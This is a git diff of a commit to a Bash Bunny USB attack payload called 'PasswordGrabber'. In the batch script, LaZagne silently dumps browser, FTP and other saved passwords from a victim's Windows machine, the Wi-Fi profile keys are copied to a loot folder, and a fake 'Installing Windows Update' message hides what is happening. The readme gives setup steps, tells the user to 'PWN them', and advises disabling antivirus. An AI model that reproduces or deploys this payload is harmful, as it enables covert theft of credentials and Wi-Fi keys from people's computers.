Updating PasswordGrabber to make it more easily understandble (#293)

payloads/library/credentials/PasswordGrabber/e.cmd

@@ -1,34 +1,20 @@
 @echo off
 @echo Installing Windows Update
 
-REM Delete registry keys storing Run dialog history
-REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
-
-REM Creates directory compromised of computer name, date and time
-REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
-
-REM This executes LaZagne in the current directory and outputs the password file to Loot
-REM Time and Date is also added
 setlocal
 cd /d %~dp0
-%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
 
-REM These lines if you just want Passwords and no files.
+REM Time and Date
-set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+set drec=%COMPUTERNAME%_%date%_%TIME: =0%
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
 mkdir %dst% >>nul
 
-if Exist %USERPROFILE%\Documents (
+REM This executes LaZagne in the current directory and outputs the password file to Loot
-REM /C Continues copying even if errors occur.
+%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
-REM /Q Does not display file names while copying.
-REM /G Allows the copying of encrypted files to destination that does not support encryption.
-REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
-REM /E Copies directories and subdirectories, including empty ones.
 
-REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
-
-REM Same as above but does not create empty directories
-REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
 
+if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
+xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
 )
 
 REM Blink CAPSLOCK key

payloads/library/credentials/PasswordGrabber/payload.txt

@@ -1,15 +1,15 @@
 #!/bin/bash
 #
-# Title:         USB Exfiltrator
+# Title:         Password Grabber
-# Author:        Hak5Darren
+# Author:        Razerblade
-# Version:       1.1
+# Version:       1.2
-# Target:        Windows XP SP3+
+# Target:        Windows
-# Props:         Diggster, IMcPwn
+# Props:         Hak5Darren, TeCHemically, dragmus31
-# Category:      Exfiltration
+# Category:      Credentials
 #
 # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
 # which in turn executes e.cmd invisibly using i.vbs
-# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
+# which in turn steals credentials by using LaZagne and saves them to /Loot
 #
 LED SETUP
 GET SWITCH_POSITION

payloads/library/credentials/PasswordGrabber/readme.md

@@ -1,25 +1,33 @@
 # PasswordGrabber
 
 * Author: RazerBlade
-* Creds: Hak5Darren, AlessandroZ
+* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
-* Version: Version 1.1
+* Version: Version 1.2
-* Firmware support: 1.1
+* Firmware support: 1.1+
-* Target: Windows
+* Target: Windows 7+
 
 ## Description
 
 Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
 This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
+This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
+
 Full read here: https://github.com/AlessandroZ/LaZagne
+Downloads here: https://github.com/AlessandroZ/LaZagne/releases
 
 
 ## Configuration
+1. You need to download the latest file from LaZagnes release page. 
+2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
+3. Plug it in a computer and PWN them.
+
+Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
+
+## INFO
 By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
-I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
-
-Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
-When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
 
+## DISCLAIMER
+Hak5 is not responsible for the execution of 3rd party binaries.
 ## STATUS
 
 | LED                | Status                                       |
@@ -28,5 +36,5 @@ When compiled or downloaded, just drop it of to the PasswordGrabbers folder and
 | Green              | Attack Complete                              |
 
 ## Discussion
-[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
+[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/